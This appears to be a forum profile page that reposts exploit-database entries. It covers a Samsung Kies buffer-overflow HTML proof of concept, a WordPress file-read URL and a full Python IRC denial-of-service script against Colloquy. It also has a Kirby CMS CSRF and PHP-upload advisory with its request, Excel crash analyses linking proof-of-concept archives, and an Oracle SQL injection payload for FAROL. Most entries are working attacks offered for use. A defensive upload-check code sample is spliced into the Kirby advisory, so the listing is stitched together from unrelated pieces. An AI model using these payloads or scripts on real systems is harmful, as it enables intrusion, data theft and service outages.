
Everything posted by HireHackking
-
Samsung Kies - Remote Buffer Overflow
source: https://www.securityfocus.com/bid/57249/info

Samsung Kies is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer. Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition.

<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title>Remote Buffer Overflow Vulnerability in Samsung Kies v. 2.5.0.12114_1 </title>
</head>
<script language='vbscript'>
Sub PoC()
arg1="defaultV"
arg2=String(14356, "A")
arg3=1
arg4=1
Target.PrepareSync arg1 ,arg2 ,arg3 ,arg4
End Sub
</script>
<body>
<h3>Remote Buffer Overflow Vulnerability in Samsung Kies by High-Tech Bridge Security Research Lab</h3>
<input language=VBScript onclick=PoC() type=button value="Proof of Concept">
</body>
<object classid='clsid:EA8A3985-F9DF-4652-A255-E4E7772AFCA8'id='Target'></object>
</html>
-
WordPress Plugin Gallery - 'filename_1' Arbitrary File Access
source: https://www.securityfocus.com/bid/57256/info

The Gallery plugin for WordPress is prone to an arbitrary file-access vulnerability. Remote attackers can exploit this issue to read arbitrary files. This may lead to further attacks. Gallery 3.8.3 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR]
-
Colloquy - Remote Denial of Service
source: https://www.securityfocus.com/bid/57255/info

Colloquy is prone to a remote denial-of-service vulnerability. Successful exploits may allow the attacker to cause the application to crash, resulting in denial-of-service conditions. Colloquy 1.3.5 and 1.3.6 are vulnerable.

###################################################################################
#                                                                                 #
#                                  H O W - T O                                    #
#                                                                                 #
#######################                                                           #
#                                                                                 #
# Provide the Target: Server, Port, Nickname and the script will deliver          #
# the payload...                                                                  #
#                                                                                 #
# [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname>                        #
#                                                                                 #
###################################################################################

from argparse import ArgumentParser
from time import sleep
import socket

shellcode = {
    # One Shot <3
    'one_shot' : [
        "687474703a2f2f782f2e2425235e26402426402426232424242425232426",
        "23242623262340262a232a235e28242923404040245e2340242625232323",
        "5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324",
        "2e24"
    ],
    # 1.3.5
    '1_3_5' : [
        "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
        "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
        "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
        "7573657228292c2873656c6563742532302d2d687474703a2f2f"
    ],
    # 1.3.6 - ( Requires Sending 25 Times )
    '1_3_6' : [
        "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
        "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
        "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
        "7573657228292c2873656c6563742532302d2d687474703a2f2f"
    ],
}

def own( sock, target, sc_key='one_shot' ):
    sc = ''.join( shellcode[sc_key] )
    targ = ''.join( ''.join( [ hex( ord( ch ) ) for ch in target ] ).split( '0x' ) )
    msg = "505249564d534720{}203a{}0d0a".format( targ, sc )
    if sc_key not in '1_3_6':
        sock.send( bytes.fromhex( msg ) )
    else:
        try:
            for x in range( 1, 26 ):
                sock.send( bytes.fromhex( msg ) )
                sleep( .64 )
        except:
            print( 'FAILED!')

def connect( uri, port, target, sc_key ):
    sock = socket.socket()
    try:
        ret = sock.connect_ex(( uri, int( port ) ))
        sock.recv(8096)
    except:
        print( "\t[-] Failed To Connect To {}".format( uri ) )
        exit()
    sock.send( b"\x4e\x49\x43\x4b\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x0d\x0a" )
    sock.send( b"\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x3c\x33\x0d\x0a" )
    while True:
        host_data = str( sock.recv( 8096 ).strip() )
        if ' 396 ' in host_data:
            print( '\t[+] Connection Successful Sending Payload To {}'.format( target ) )
            own( sock, target, sc_key )
            sock.send( b'QUIT\r\n' )
            sock.close()
            break
        try:
            msg = host_data.split()
            if msg[0].lower() is 'ping':
                sock.send( b"PONG {}\r\n".format( msg[1] ) )
                continue
        except:
            pass
    print( '\t[!] Payload Sent, Target Should Drop Shortly <3' )

if __name__ == '__main__':
    parser = ArgumentParser( description='#legion Colloquy IRC DoS; Requires At Least A Nick To Target' )
    parser.add_argument( '-t', '--target', dest='target', default='localhost', help="IRCD Server Uri To Connect On" )
    parser.add_argument( '-p', '--port', dest='port', default=6667, help="Port To Connect On" )
    parser.add_argument( '-n', '--nick', dest='nick', metavar='NICK', help="Nick To Target" )
    parser.add_argument( '-s', '--shellcode', dest='shellcode', default='one_shot', help='Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )' )
    args = parser.parse_args()
    if args.nick is None:
        parser.print_help()
        exit()
    connect( args.target, args.port, args.nick, args.shellcode.strip() )
-
Kirby CMS 2.1.0 - Cross-Site Request Forgery / Content Upload / PHP Script Execution
=============================================
- Release date: 14.09.2015
- Discovered by: Dawid Golunski
- Severity: High
=============================================

I. VULNERABILITY
-------------------------

Kirby CMS <= 2.1.0 CSRF Content Upload and PHP Script Execution

II. BACKGROUND
-------------------------

- Kirby CMS

"Kirby is a file‑based CMS Easy to setup. Easy to use. Flexible as hell."

http://getkirby.com/

III. INTRODUCTION
-------------------------

KirbyCMS has a vulnerability that allows uploading normally disallowed PHP script files. This issue can only be exploited by authenticated users; however, the admin role is not required.

Additionally, KirbyCMS has another vulnerability, Cross-Site Request Forgery (CSRF), which may allow attackers to perform file upload actions on behalf of already authenticated KirbyCMS users, if an attacker manages to trick them into visiting a specially-crafted website. This issue can allow an unauthorised attacker to modify or upload new content.

Both of the issues can be combined to execute arbitrary PHP code on the remote server hosting KirbyCMS, if a logged-in victim visits a malicious page containing an exploit crafted by an attacker.

IV. PHP Code Execution
-------------------------

KirbyCMS allows both admin users and low-privileged editor users who can access the control panel to upload content. The upload feature allows uploading images and other media files, which can be referenced within the content once uploaded.

KirbyCMS performs the following validation before saving an uploaded file to prohibit risky uploads:

---[ panel/app/controllers/api/files.php ]---

protected function checkUpload($file, $blueprint) {
  if(strtolower($file->extension()) == kirby()->option('content.file.extension', 'txt')) {
    throw new Exception('Content files cannot be uploaded');
  } else if(strtolower($file->extension()) == 'php' or in_array($file->mime(), f::$mimes['php'])) {
    throw new Exception('PHP files cannot be uploaded');
  } else if(strtolower($file->extension()) == 'html' or $file->mime() == 'text/html') {
    throw new Exception('HTML files cannot be uploaded');
  ...
}

---------------------------------------------

As we can see, it prevents uploading PHP files by checking whether the uploaded file has a '.php' extension, or whether the detected MIME type of the file evaluates to PHP. KirbyCMS throws an exception and stops further processing if either condition is true.

Unfortunately, both checks can easily be bypassed on many server configurations. Many configurations, such as Ubuntu or Debian, process several file extensions as PHP scripts, e.g. .php, .php4, .php5. The extension check can therefore be evaded simply by uploading a malicious file with the '.php4' extension.

The MIME type check can also be bypassed easily by preceding the <?php script tags with <?xml tags, to trick the MIME detector into recognising the malicious file as XML and thus passing the check (mime['php'] != mime['xml']).

As the upload directory does not disable script execution by default, bypassing the checks allows uploading arbitrary PHP scripts and executing them on the remote server hosting a vulnerable KirbyCMS installation.

V. CSRF
-------------------------

Media files are only meant to be uploaded by authenticated users such as editors or site administrators.

However, KirbyCMS's upload function does not protect against cross-site request forgery by including a CSRF token to verify the source of the request. As a result, an attacker can prepare a specially-crafted webpage which will upload a malicious file to the remote KirbyCMS site without the user's permission, if the attacker manages to trick the logged-in victim into visiting the page.

VI. PROOF OF CONCEPT
-------------------------

Both of the issues described above can be combined to prepare a malicious page which uploads an arbitrary PHP file as soon as a victim authenticated to KirbyCMS visits the page.

A malicious CSRF HTML page could send a request similar to the following:

POST /kirby/panel/api/files/upload/about HTTP/1.1
Host: victim_kirby_server
Content-Type: multipart/form-data; boundary=---------------------------4679830631250006491995140822
Content-Length: 261
Origin: null
Cookie: PHPSESSID=tjnqqia89ka0q7khl4v72r6nl1; kirby=323b04a2a3e7f00...

-----------------------------4679830631250006491995140822
Content-Disposition: form-data; name="file"; filename="kirbyexec.php5"
Content-Type: application/x-php

<?xml >
<?php phpinfo(); ?>
-----------------------------4679830631250006491995140822--

This uploads the file into the kirby/content/1-about directory on the server. The malicious file can then be accessed via the URL:

http://victim_kirby_server/kirby/content/1-about/kirbyexec.php5

Once opened, the phpinfo() page should be loaded.

VII. BUSINESS IMPACT
-------------------------

By combining the two issues an attacker could execute arbitrary PHP code on the remote server without any authentication to gain full control over the website using a vulnerable KirbyCMS.

VIII. SYSTEMS AFFECTED
-------------------------

The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable.

To exploit the PHP script execution vulnerability the webserver must be configured to process files as PHP with extensions other than .php. Ubuntu and Debian systems fulfil this condition. There might be more systems which are configured this way by default, or have been reconfigured to do so.

To gain access to the control panel and upload a malicious PHP file, an attacker may be able to exploit a separate Authentication Bypass issue also discovered by Dawid Golunski, described in a separate document.

IX. SOLUTION
-------------------------

Upgrade to the patched version 2.1.1 released by the vendor upon this advisory.

X. REFERENCES
-------------------------

http://legalhackers.com
http://legalhackers.com/advisories/KirbyCMS-CSRF-PHP-File-Upload-Vulnerability.txt
http://getkirby.com/
http://seclists.org/fulldisclosure/2015/Sep/index.html
http://www.securiteam.com/

XI. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com

XII. REVISION HISTORY
-------------------------

14.09.2015 - Final

XIII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
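The two bypasses in the Kirby advisory (an alternate script extension such as .php4, and a "<?xml" prefix that fools a start-of-file MIME sniffer) both defeat a deny-list that looks at one extension and one sniffed type. The following is an added example, not Kirby's code nor the 2.1.1 fix, of an upload check written the other way round: an allow-list of extensions applied to every dotted suffix, a scan of the whole body for a PHP open tag, and a per-session CSRF token checked before the file is looked at. The extension sets, the token helpers and the sample uploads are all constructed for this example.

```python
import hmac
import re
import secrets
from typing import Optional

# Extensions that common PHP handler configurations execute as scripts
# (the advisory names .php4/.php5 on Debian/Ubuntu; the rest of this set is
# an assumption for the example, not taken from Kirby).
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Allow-list of what the upload endpoint actually needs (assumed here).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}

# A PHP open tag anywhere in the body, not just at byte 0, so a leading
# "<?xml" that satisfies a MIME sniffer does not hide it.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def upload_problem(filename: str, content: bytes) -> Optional[str]:
    """Return None if the upload is acceptable, otherwise the reason it is not.

    Every dotted suffix is examined, so 'shell.php4' and 'shell.php.jpg'
    are both caught; the final suffix must be on the allow-list; and the
    body is scanned for a PHP open tag regardless of the sniffed MIME type.
    """
    parts = filename.lower().split(".")
    if len(parts) < 2 or any(not p for p in parts):
        return "missing or empty extension"
    suffixes = parts[1:]
    if any(s in SCRIPT_EXTENSIONS for s in suffixes):
        return "script extension"
    if suffixes[-1] not in ALLOWED_EXTENSIONS:
        return "extension not on allow-list"
    if PHP_OPEN_TAG.search(content):
        return "PHP open tag in body"
    return None


def issue_csrf_token(session: dict) -> str:
    """Mint a per-session token; the upload form has to echo it back."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def verify_csrf(session: dict, submitted: Optional[str]) -> bool:
    """Constant-time comparison of the submitted token with the session's."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_upload(session: dict, submitted_token: Optional[str],
                  filename: str, content: bytes) -> Optional[str]:
    """CSRF check first (a forged cross-site POST carries no valid token),
    then the content checks. None means the file may be stored."""
    if not verify_csrf(session, submitted_token):
        return "missing or invalid CSRF token"
    return upload_problem(filename, content)


if __name__ == "__main__":
    # Constructed samples: the advisory's PoC body and a genuine PNG header.
    poc_body = b"<?xml >\n<?php phpinfo(); ?>\n"
    png_header = b"\x89PNG\r\n\x1a\n"
    session = {}
    token = issue_csrf_token(session)
    for name, body, tok in [
        ("kirbyexec.php5", poc_body, token),   # alternate script extension
        ("kirbyexec.jpg", poc_body, token),    # tag hidden behind <?xml
        ("photo.png", png_header, None),       # forged request, no token
        ("photo.png", png_header, token),      # accepted
    ]:
        print(name, "->", handle_upload(session, tok, name, body) or "accepted")
```

Two caveats a deployment would add: if the server runs with short_open_tag enabled, a bare "<?" is also an open tag and the pattern should be widened accordingly, and no content check replaces serving the upload directory with script execution disabled.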
-
Microsoft Excel 2007/2010/2013 - BIFFRecord Use-After-Free
Source: https://code.google.com/p/google-security-research/issues/detail?id=462

The following crash was observed in Microsoft Excel 2007 running on Windows 2003 R2. This crash was also reproduced in Microsoft Excel 2010 on Windows 7 x86 and Microsoft Excel 2013 on Windows 8.1 x86. The test environment was Excel 2007 on Windows 2003 R2 with Application Verifier basic checks enabled.

Attached files:
Original File: 683709058_orig.xls
Crashing File: 683709058_crash.xls
Minimized Crashing File: 683709058_min.xls

The minimized crashing file shows two deltas from the original. The first, at offset 0x237, is in the data of the 4th BIFFRecord; the second, at offset 0x34a5, is in the type field of a BIFFRecord.

File versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000

Observed Crash:
eax=00000000 ebx=00000000 ecx=0ce119f8 edx=00003fff esi=0e98de10 edi=0013c82c
eip=30037cc5 esp=00137180 ebp=00137188 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Excel.exe -
Excel!Ordinal40+0x37cc5:
30037cc5 0fb64604 movzx eax,byte ptr [esi+4] ds:0023:0e98de14=??
0:000> kb L8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00137188 303df098 0e98de10 00000000 00000102 Excel!Ordinal40+0x37cc5
0013d068 30528190 0013d0a8 00000102 00000000 Excel!Ordinal40+0x3df098
0013d2bc 305280b1 00000000 00000001 00000008 Excel!Ordinal40+0x528190
0013d330 3038d46d 0013ddf2 00000000 00000001 Excel!Ordinal40+0x5280b1
0013e000 300084a4 0013e104 00000001 0013f568 Excel!Ordinal40+0x38d46d
0013fbb0 30005e9a 02270fd7 00000003 30f61708 Excel!Ordinal40+0x84a4
0013feb8 30003b3a 00000000 02270fd7 00000003 Excel!Ordinal40+0x5e9a
0013ff30 30003884 30000000 00000000 02270fd7 Excel!Ordinal40+0x3b3a

In this crash esi is a heap address.
We can see that this is a freed chunk:

0:000> !heap -p -a 0xe98de10
address 0e98de10 found in
_DPH_HEAP_ROOT @ 1161000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
e7f0fc0: e98d000 2000
7c83e330 ntdll!RtlFreeHeap+0x0000011a
018b1611 vfbasics!AVrfpRtlFreeHeap+0x000000a8
331039d5 mso!Ordinal1743+0x00002d4d
329c91d1 mso!MsoFreePv+0x0000003f
30298310 Excel!Ordinal40+0x00298310
30300ac3 Excel!Ordinal40+0x00300ac3
305f1899 Excel!Ordinal40+0x005f1899

This is a use-after-free vulnerability affecting all currently supported versions of Microsoft Excel.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38214.zip
-
Microsoft Office 2007 - BIFFRecord Length Use-After-Free
Source: https://code.google.com/p/google-security-research/issues/detail?id=464

The following crash was observed in Microsoft Office 2007 with the Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.

Attached files:
Original File: 1105668828_orig.xls
Crashing File: 1105668828_crash.xls
Minimized Crashing File: 1105668828_min.xls

The minimized crashing file shows two one-bit deltas from the original file. The first delta is at offset 0x1CF7E and the second at offset 0x3A966. Both of these offsets appear to be BIFFRecord lengths.

File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000

Observed Crash:
eax=00000000 ebx=00000000 ecx=00000000 edx=0012e3bc esi=0ecd8ff0 edi=0000089e
eip=3035a5ed esp=0012e3b0 ebp=0012e410 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
3035a5e4 0f8530270a00 jne Excel!Ordinal40+0x3fcd1a (303fcd1a)
3035a5ea 8b7518 mov esi,dword ptr [ebp+18h]
Excel!Ordinal40+0x35a5ed:
3035a5ed 8b0e mov ecx,dword ptr [esi] ds:0023:0ecd8ff0=????????
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012e410 3035ab4d 00134dc0 0000089e 00000028 Excel!Ordinal40+0x35a5ed
00130464 3035ab9e 00000028 0000000a ffffffff Excel!Ordinal40+0x35ab4d
00131ef0 3026f1cd 00000002 00000000 00000118 Excel!Ordinal40+0x35ab9e
00132514 3026d160 0000000a 00132560 00000118 Excel!Ordinal40+0x26f1cd
0013279c 30263a3d 0e1ecfb8 0000000a 00000000 Excel!Ordinal40+0x26d160
00132c98 302636a5 0e1ecfb8 00000004 00132d20 Excel!Ordinal40+0x263a3d
00132cac 3025869a 00000004 00132d20 00000000 Excel!Ordinal40+0x2636a5
00132d2c 30258553 00134dc0 0000001a 00132d58 Excel!Ordinal40+0x25869a
00132e7c 30258470 30edc060 0e17ac00 0ebb7fac Excel!Ordinal40+0x258553
00132e94 32c50135 30edc060 0e17ac00 00133190 Excel!Ordinal40+0x258470
00132f48 32c4fb6d 00133190 0e83ce38 00000001 mso!Ordinal6768+0x13e7
00132f98 32c4fd30 00133190 00132fec 00000001 mso!Ordinal6768+0xe1f
00132ff8 32c4fb6d 000001be 0e83ce38 00000001 mso!Ordinal6768+0xfe2
00133048 32c4f756 00133190 001330cc 00000000 mso!Ordinal6768+0xe1f
00133108 32c4f0e2 00133190 30eba978 0e74ed90 mso!Ordinal6768+0xa08
0013313c 302583f2 0e74ed90 00133190 0e83ce38 mso!Ordinal6768+0x394
001331c8 302582df 0cc88fd8 00134dc0 00002020 Excel!Ordinal40+0x2583f2
00133f44 301153f9 0cc88fd8 00134b88 00000102 Excel!Ordinal40+0x2582df

We can see that esi is holding a pointer to invalid memory. This is a heap address.
0:000> !heap -p -a 0xecd8ff0
address 0ecd8ff0 found in
_DPH_HEAP_ROOT @ 1161000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
eb04f40: ecd8000 2000
7c83e330 ntdll!RtlFreeHeap+0x0000011a
018b1611 vfbasics!AVrfpRtlFreeHeap+0x000000a8
331039d5 mso!Ordinal1743+0x00002d4d
329c91d1 mso!MsoFreePv+0x0000003f
3025ac56 Excel!Ordinal40+0x0025ac56
3026f1cd Excel!Ordinal40+0x0026f1cd
3026d160 Excel!Ordinal40+0x0026d160
30263a3d Excel!Ordinal40+0x00263a3d
302636a5 Excel!Ordinal40+0x002636a5
3025869a Excel!Ordinal40+0x0025869a
30258553 Excel!Ordinal40+0x00258553
30258470 Excel!Ordinal40+0x00258470
32c50135 mso!Ordinal6768+0x000013e7
32c4fb6d mso!Ordinal6768+0x00000e1f

Esi points into a freed allocation. This is a use-after-free vulnerability.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38215.zip
-
FAROL - SQL Injection
# Exploit Title: Web Application Farol with unauthenticated SQL injection
# Date: 2015-09-16
# Exploit Author: Thierry Fernandes Faria [ a.k.a SoiL ] [ thierryfariaa (at) gmail (dot) com ]
# Vendor Homepage: http://www.teiko.com.br/pt/solucoes/infraestrutura-em-ti/farol
# Version: [All]
# CVE : CVE-2015-6962
# OWASP Top10: A1-Injection

+---------------------+
+ Product Description +
+---------------------+

The FAROL web application is software that monitors databases.

+----------------------+
+ Exploitation Details +
+----------------------+

A vulnerability has been detected in the login page of the FAROL web application: an unauthenticated SQL injection. The e-mail field on the login page is vulnerable to error-based SQL injection.

Vulnerable Page: http://target/tkmonitor/estrutura/login/Login.actions.php?recuperar
Vulnerable POST Parameter: email

Usage: email'[SQLi error based]--

eg: email=1'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--

ORA-20000: Oracle Text error: DRG-11701: thesaurus CORE 11.2.0.4.0 ProductionNLSRTL Version 11.2.0.4.0 - ProductionOracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit ProductionPL/SQL Release 11.2.0.4.0 - ProductionTNS for Linux: Version 11.2.0.4.0 - Production does not exist ORA-06512: at "CTXSYS.DRUE", line 160

+----------+
+ Solution +
+----------+

Upgrade the software
-
Microsoft Office 2007 - OLESSDirectoryEntry.CreateTime Type Confusion
Source: https://code.google.com/p/google-security-research/issues/detail?id=465

The following crash was observed in Microsoft Office 2007 with the Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.

Attached files:
Original File: 1516065514_orig.xls
Crashing File: 1516065514_crash.xls
Minimized Crashing File: 1516065514_min.xls

The minimized crashing file shows a one-bit delta from the original file at offset 0x49E8. OffVis reports this to be the CreateTime field of an OLESSDirectoryEntry structure.

File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000

Observed Crash:

When run without Application Verifier enabled the following crash occurs:
eax=30272d58 ebx=03b49330 ecx=03b49144 edx=03a64d44 esi=30f6dca0 edi=03a64d40
eip=fffffffc esp=00133e80 ebp=00133e84 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
fffffffc ?? ???
0:000> kb L8
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
00133e7c 3028f4da 00133ec8 3028d2ef 00000005 0xfffffffc
00133e84 3028d2ef 00000005 00000001 03b49200 Excel!Ordinal40+0x28f4da
00133ec8 30290e14 03b49330 00000001 00000000 Excel!Ordinal40+0x28d2ef
00133fa0 3028a2b9 00000000 00000000 00000000 Excel!Ordinal40+0x290e14
00134130 302912ae 00000000 00000000 00000000 Excel!Ordinal40+0x28a2b9
0013414c 30286206 00000001 00000000 03b66c00 Excel!Ordinal40+0x2912ae
001341cc 302860ce 00000000 ffffffff 00000001 Excel!Ordinal40+0x286206
0013426c 30282360 03b49000 027c6a00 d107955b Excel!Ordinal40+0x2860ce

In this crash eip was corrupted to 0xfffffffc.
Tracing through sub_3028F4B4 we see something along the lines of:

x = *dword_30F5F9BC + 0x144; // x=0x30272d58
fptr = x + x[0x14];          // x[0x14] == 0
fptr();                      // calling pointer at 0x30272d58 = 0xfffffffc

It looks as though the global variable at 30f5f9bc was used with incorrect type information or was otherwise corrupted.

Running the same PoC file again, but with Application Verifier enabled, gets us closer to the root of the issue, with the following crash observed:
eax=0ff28e50 ebx=07b42420 ecx=0012c91c edx=00000020 esi=0364efe8 edi=00000000
eip=30299c9e esp=0012c944 ebp=0012c950 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Excel.exe -
Excel!Ordinal40+0x299c9e:
30299c9e 8b80f0030000 mov eax,dword ptr [eax+3F0h] ds:0023:0ff29240=????????
0:000> kb L8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012c950 3006b70a 00000005 00000001 07b42420 Excel!Ordinal40+0x299c9e
0012cc84 3006b556 0012ceb4 0020020a 07b42420 Excel!Ordinal40+0x6b70a
0012ce8c 3006b3a2 0012ceb4 0ee46ff0 00000009 Excel!Ordinal40+0x6b556
00133050 3006a11c 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x6b3a2
00133ca0 3006a01b 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x6a11c
00133d50 30069ead 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x6a01b
00133d70 302972c0 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x69ead
00133e28 302974c7 0f82ef58 00133ec0 00133eac Excel!Ordinal40+0x2972c0

We can see here that eax is being indexed at an offset of 0x3f0. However, if we look at the actual allocation for the chunk eax points to, we see that the allocation size was only 0x1b0.
0:000> !heap -p -a 0xff28e50
address 0ff28e50 found in
_DPH_HEAP_ROOT @ 1161000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
f7b5400: ff28e50 1b0 - ff28000 2000
7c83d6d4 ntdll!RtlAllocateHeap+0x00000e9f
018b1504 vfbasics!AVrfpRtlAllocateHeap+0x000000c3
33103a8f mso!Ordinal1743+0x00002e07
329c7e66 mso!MsoPvAllocCore+0x0000005a
3000b694 Excel!Ordinal40+0x0000b694
3000b640 Excel!Ordinal40+0x0000b640

This PoC behaves like a type confusion or memory corruption issue in areas not protected by Application Verifier. The fact that eip was corrupted indicates a high likelihood of exploitability.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38216.zip
-
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
Source: https://code.google.com/p/google-security-research/issues/detail?id=469

The following crash was observed in Microsoft Office 2007 Excel with the Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.

Attached files:
Original File: 3013413838_orig.xls
Crashing File: 3013413838_crash.xls
Minimized Crashing File: 3013413838_min.xls

The minimized crashing file shows a one-bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file.

File Versions:
Excel.exe: 12.0.6718.5000
OGL.dll: 12.0.6719.5000
oart.dll: 12.0.6683.5002
GDI32.dll: 5.2.3790.5563

Observed Crash:

This crashing eip was observed 4 times in fuzzing results, with various invalid memory addresses being dereferenced.

eax=8a94e1a1 ebx=00000000 ecx=10a80598 edx=8a94e1a0 esi=0013d478 edi=0013d42c
eip=3bd18f75 esp=0013d3dc ebp=0013d3e0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
OGL!ScanOperation::Convert_24_sRGB:
3bd18f68 55 push ebp
3bd18f69 8bec mov ebp,esp
3bd18f6b 837d0800 cmp dword ptr [ebp+8],0
3bd18f6f 7431 je OGL!ScanOperation::Convert_24_sRGB+0x3a (3bd18fa2)
3bd18f71 8d4201 lea eax,[edx+1]
3bd18f74 56 push esi
=> 3bd18f75 0fb65001 movzx edx,byte ptr [eax+1] ds:0023:8a94e1a2=??
0:000> kb L8
ChildEBP RetAddr Args to Child
0013d3e0 3be703b3 0000666f 0013d42c 00000000 OGL!ScanOperation::Convert_24_sRGB+0xd
0013d3fc 3be18f32 00000000 8a94e1a0 0000666f OGL!EpAlphaBlender::Blend+0x55
0013d568 3bd9f6c1 0013d894 00000000 0013d58c OGL!ConvertBitmapData+0x61
0013d5a4 3bde4137 00000000 00000001 000e200b OGL!GpMemoryBitmap::InternalLockBits+0x105
0013d5d0 3bdfa09b 05492fa8 0013d5f8 00000001 OGL!GpMemoryBitmap::LockBits+0xba
0013d608 3bdfac0c 0013d7bc 0013d894 0013d62c OGL!CopyOnWriteBitmap::PipeLockBitsFromMemory+0xb8
0013d6e8 3bd2b7e7 0013d7bc 0013d894 0013d7d0 OGL!CopyOnWriteBitmap::PipeLockBits+0x553
0013d700 3be4cc56 0013d7bc 0013d894 00000001 OGL!GpBitmap::PipeLockBits+0x4e

The function OGL!ScanOperation::Convert_24_sRGB was called with edx pointing to an invalid memory location: 0x8a94e1a0. Tracing back, we can find that the heap address where edx came from was allocated with the following call stack:

3be70fe2 OGL!GpMalloc+0x00000014
3bd58669 OGL!CopyOnWriteBitmap::CopyOnWriteBitmap+0x00000049
3be0517e OGL!CopyOnWriteBitmap::Create+0x00000021
3be0514d OGL!GpBitmap::GpBitmap+0x00000030

The edx value was copied in from the stack at the following location in OGL!GpMemoryBitmap::InitMemoryBitmap():

3bd4f6f0 8b45fc mov eax,dword ptr [ebp-4]
3bd4f6f3 6a06 push 6
3bd4f6f5 59 pop ecx
3bd4f6f6 8bf3 mov esi,ebx
=>3bd4f6f8 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

The stack location was set with the invalid value here in OGL!ValidateBitmapInfo():

3bda46ed 8b4d08 mov ecx,dword ptr [ebp+8]
3bda46f0 895804 mov dword ptr [eax+4],ebx
3bda46f3 895008 mov dword ptr [eax+8],edx
3bda46f6 89480c mov dword ptr [eax+0Ch],ecx
=> 3bda46f9 897810 mov dword ptr [eax+10h],edi

Edi is set earlier as the result of an imul instruction whose product is then added to a base heap pointer:

.text:3BDA46CB lea edi, [ebx-1]
.text:3BDA46CE imul edi, edx
.text:3BDA46D1 add edi, [ebp+arg_4] ; bad value here

With this PoC edi=0x0000666e and edx=0x00013350.
The edx value is calculated earlier in the same function. If 0xf9ef540 is the base pointer (arg_4), we end up setting this value to 0x666e*0x13350+0xf9ef540, or 0x8a94e1a0, as we saw in the initial bad memory access. The heap chunk referenced at 0xf9ef540 has an original allocation size of 15156, and we've set our pointer far out of bounds of this allocation range.

There is a distinct lack of overflow checks and bounds checking in the OGL!ValidateBitmapInfo function that may lead to memory corruption when doing bitmap conversion later on in the code. For example, if the 0x13350 value is able to grow to 0x27fd0, the edi value becomes 0xffffcb60 (0x666e * 0x27fd0 = 0xffffcb60), which leads to an out-of-bounds write instead of an out-of-bounds read later in the code.

Proof of Concept:
